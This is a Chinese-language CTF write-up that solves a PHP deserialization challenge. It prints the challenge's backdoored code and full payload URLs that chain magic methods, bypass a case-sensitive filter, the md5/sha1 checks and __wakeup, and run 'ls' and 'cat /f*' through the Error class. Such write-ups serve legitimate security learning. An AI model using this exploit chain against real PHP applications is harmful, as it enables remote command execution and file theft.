[网络安全/CTF] 记一次PHP序列化反序列化解题详析

简介: [网络安全/CTF] 记一次PHP序列化反序列化解题详析

姿势

题目给出以下代码:

<?php
error_reporting(0);
function backdoor()
{
    $a = $_GET["a"];
    $b = $_GET["b"];
    $d = $_GET["d"];
    $e = $_GET["e"];
    $f = $_GET["f"];
    $g = $_GET["g"];
    $class = new $a($b);
    $str1 = substr($class, $d, $e);
    $str2 = substr($class, $f, $g);
    $str1($str2);
}
class popko
{
    public $left;
    public $right;
    public function __call($method,$args)
    {
        if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
            echo "backdoor is here";
            backdoor();
        }
    }
    public function __wakeup()
    {
        $this->left = "";
        $this->right = "";
    }
}
class pipimi
{
    function __destruct()
    {
        echo $this->a->a();
    }
}
$c = $_GET["c"];
if ($c != null) {
    if (strstr($_GET["c"], "popko") === false) {
        unserialize($_GET["c"]);
    } else {
        echo ":)";
    }
} else {
    highlight_file(__FILE__);
} 

代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用


故需要运行call方法


而call方法是在对象上下文中调用不可访问的方法时触发的


故需要调用不可访问的方法


而恰巧destruct方法中并不存在a对象和a函数


故需要运行destruct方法


而destruct方法在对象被销毁时触发


如何实现对象被销毁呢?


当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法


所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destruct被执行后,调用popko类,从而运行call方法,进而调用backdoor函数

对于

 if (strstr($_GET["c"], "popko") === false) {
        unserialize($_GET["c"]);
    } else {
        echo ":)";

这串代码的意思是:当我们传入的c不含有popko时 ,将对传入的参数c进行反序列化;否则将打印:)


所以我们要传入一个参数c,让它实现反序列化,却又含有popko


由于PHP是一种弱语言,函数名、方法名、类名不区分大小写,即class Object 与 class object 在解析时被当作一个变量


而strstr函数是区分大小写的


所以可以利用类名大小写不敏感但过滤函数大小写敏感的特性,构造popko链子(将popko改为Popko)

对于

 if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {
            echo "backdoor is here";
            backdoor();
        }

要求left和right值不同,但md5加密所得的值相同,才能调用backdoor()函数


故使用数组传参绕过,即left[]=1&right[]=2


所以构造的链子为:

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":2:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

对象类名是 "pipimi",有一个属性 "a"。
"a" 属性的值是另一个对象类型 "Popko"。
"Popko" 对象有两个属性: "left" 和 "right"。
"left" 属性是一个包含一个元素的数组,该元素的值为 1。
"right" 属性是一个包含一个元素的数组,该元素的值为 2。

而执行unserialize()时,先会调用wakeup方法,如何绕过呢?


当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup方法的执行


所以将Popko的属性个数值增加为3即可:


/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

回显如下:

成功进入后门

接着我们看看后门函数是怎么描述的:

function backdoor()
{   $a = $_GET["a"];
    $b = $_GET["b"];
    $d = $_GET["d"];
    $e = $_GET["e"];
    $f = $_GET["f"];
    $g = $_GET["g"];
    $class = new $a($b);
    $str1 = substr($class, $d, $e);
    $str2 = substr($class, $f, $g);
    $str1($str2);}

$class = new $a($b); 此语句new了新的类,但不可进行反序列化,这就遇到了需要反序列化但没有指定类的情况,所以只能找到PHP内置类(即原生类)来进行反序列化。

对于参数a,使用原生类中的error类即可

看看substr函数的语法:

故POC构造如下:


/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemls&d=7&e=6&f=13&g=2


回显如下:

使用命令抓取f开头的所有文件的内容即可:

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemcat /f*&d=7&e=6&f=13&g=7


其中,d、e、f、g的值需根据回显不断修改


得到flag:


总结

以上为一次PHP序列化反序列化解题详析记录,考察php代码审计、php强比较、序列化反序列化等知识点。

我是秋说,我们下次见。

目录
相关文章
|
1月前
|
缓存 安全 PHP
PHP中的魔术方法与对象序列化
本文将深入探讨PHP中的魔术方法,特别是与对象序列化和反序列化相关的__sleep()和__wakeup()方法。通过实例解析,帮助读者理解如何在实际应用中有效利用这些魔术方法,提高开发效率和代码质量。
|
10天前
|
SQL 安全 前端开发
PHP与现代Web开发:构建高效的网络应用
【10月更文挑战第37天】在数字化时代,PHP作为一门强大的服务器端脚本语言,持续影响着Web开发的面貌。本文将深入探讨PHP在现代Web开发中的角色,包括其核心优势、面临的挑战以及如何利用PHP构建高效、安全的网络应用。通过具体代码示例和最佳实践的分享,旨在为开发者提供实用指南,帮助他们在不断变化的技术环境中保持竞争力。
|
6月前
|
安全 网络安全 PHP
深入理解PHP的命名空间与自动加载机制网络安全与信息安全:防护之道与攻防之术
【5月更文挑战第29天】在PHP的开发实践中,命名空间和自动加载机制是两个重要的概念,它们共同构成了现代PHP代码组织的基础。本文将详细解释命名空间在PHP中的应用,探讨其解决代码冲突和提高代码复用性的能力,同时深入研究自动加载机制的原理及其在项目中的实际运用,帮助开发者构建更加高效、易于维护的PHP应用。
|
3月前
|
PHP
PHP——将网络图片转为Base64
PHP——将网络图片转为Base64
46 1
|
3月前
|
安全 中间件 网络安全
深入浅出PHP框架之Laravel的优雅云计算与网络安全:探索云服务、网络安全和信息安全的技术领域
【8月更文挑战第29天】在编程的世界里,PHP以其灵活性和易用性广受欢迎。本文将深入探讨PHP的一个流行框架——Laravel,揭示它如何以简洁、高雅的解决方案满足复杂的开发需求。我们将一起走进Laravel的世界,探索其背后的哲学,以及它如何让代码变得更加动人和富有韵律。
|
3月前
|
安全 网络安全 PHP
云计算与网络安全:技术融合下的新挑战PHP 在现代Web开发中的角色和挑战
【8月更文挑战第23天】随着云计算技术的飞速发展,企业和个人越来越依赖云服务来处理和存储数据。然而,这种便利性也带来了前所未有的网络安全风险。本文将探讨云计算环境中的网络安全挑战,分析信息安全的关键问题,并提出相应的防护措施。我们将深入讨论如何通过策略和技术的结合来增强云安全,确保数据的安全和隐私保护。
|
6月前
|
存储 监控 安全
Pikachu PHP 反序列化通关解析
Pikachu PHP 反序列化通关解析
|
6月前
|
安全 算法 网络安全
深入理解PHP的命名空间网络安全与信息安全:防护之道
【5月更文挑战第28天】 在现代PHP开发中,命名空间是一个不可或缺的概念。它不仅解决了代码库中的类名冲突问题,还为自动加载、依赖管理以及代码组织提供了强有力的支持。通过本文,我们将详细探讨PHP命名空间的工作原理、使用方法以及在实际项目中的应用,帮助开发者更好地掌握和运用这一技术。 【5月更文挑战第28天】随着信息技术的飞速发展,网络已经深度融入人类生活的方方面面。然而,网络安全问题也随之凸显,成为亟待解决的全球性难题。本文将深入探讨网络安全中的漏洞问题、加密技术以及安全意识等方面的内容,以期为读者提供一份全面的网络安全知识分享。
|
5月前
|
存储 网络协议 数据建模
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
|
6月前
|
XML 存储 JSON
[计算机网络]---序列化和反序列化
[计算机网络]---序列化和反序列化
下一篇
无影云桌面